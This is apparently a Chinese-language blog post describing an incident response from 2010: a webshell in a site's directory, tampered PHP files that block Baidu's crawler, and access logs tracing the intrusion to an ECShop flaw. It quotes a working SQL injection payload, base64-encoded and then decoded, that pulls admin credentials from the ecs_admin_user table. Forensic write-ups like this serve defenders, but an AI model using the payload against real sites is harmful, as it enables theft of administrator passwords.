某网站不能正常访问,检查发现其WEB目录下面部分php文件被修改。因为服务器安装了Tripwire,根据Tripwire的文件完整性检查日志可以知道那些文件被修改了,替换被修改了的文件,网站业务恢复。
对比被修改的php文件,发现入侵者应该是该网站的竞争对手或者是竞争对手找的小黑,目的是让这个网站屏蔽Baidu爬虫,以利于他自己的业务推广。
日志分析发现入侵者留了一个PHP木马,并利用这个木马进行过文件编辑,可惜该木马对UTF-8编码的文件支持太差,修改后的文件中文都是乱码。
60.182.70.x - - [22/May/2010:03:07:47 +0800] "POST /administrator/images/help.php HTTP/1.1" 200 233 "http://www.xx.net/administrator/images/help.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)" "-"
删除木马之后,发现入侵者还是尝试再次访问木马页面的,日志如下:
122.243.131.x - - [22/May/2010:17:57:35 +0800] "GET /administrator/images/help.php HT TP/1.1" 404 56 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)" " -" 122.243.131.x - - [22/May/2010:18:03:56 +0800] "GET /administrator/images/ HTTP/1.1" 404 522 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)" "-" 122.243.131.x - - [22/May/2010:18:04:02 +0800] "GET /administrator/images/help.php/x. jpg HTTP/1.1" 404 522 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)" "-"
进一步检查这个IP还做什么事情,发现攻击者是能够查看文件目录的,于是继续寻找其他后门。发现同一台服务器上的其他虚拟主机确实还有木马文件,初步认为入侵是源自那里。
//update:
后来发现入侵者还是写入了新的shell,只是没办法在那些目录下面执行,呵呵。通过日志检查发现他们是利用了ECShop的安全漏洞,利用这个漏洞产生的日志如下:
221.238.129.x - - [26/May/2010:18:28:40 +0800] "GET /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319 HTTP/1.1" 200 560 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; QQDownload 638; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Media Center PC 5.0; SLCC1; Tablet PC 2.0)" "-"
攻击者提交的数据base64 decode的内容是:
a:1:{s:4:"attr";a:1:{s:125:"1') and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'"\') union select 1#"'),1 from ecs_admin_user#";s:1:"1";}}
Leave a Reply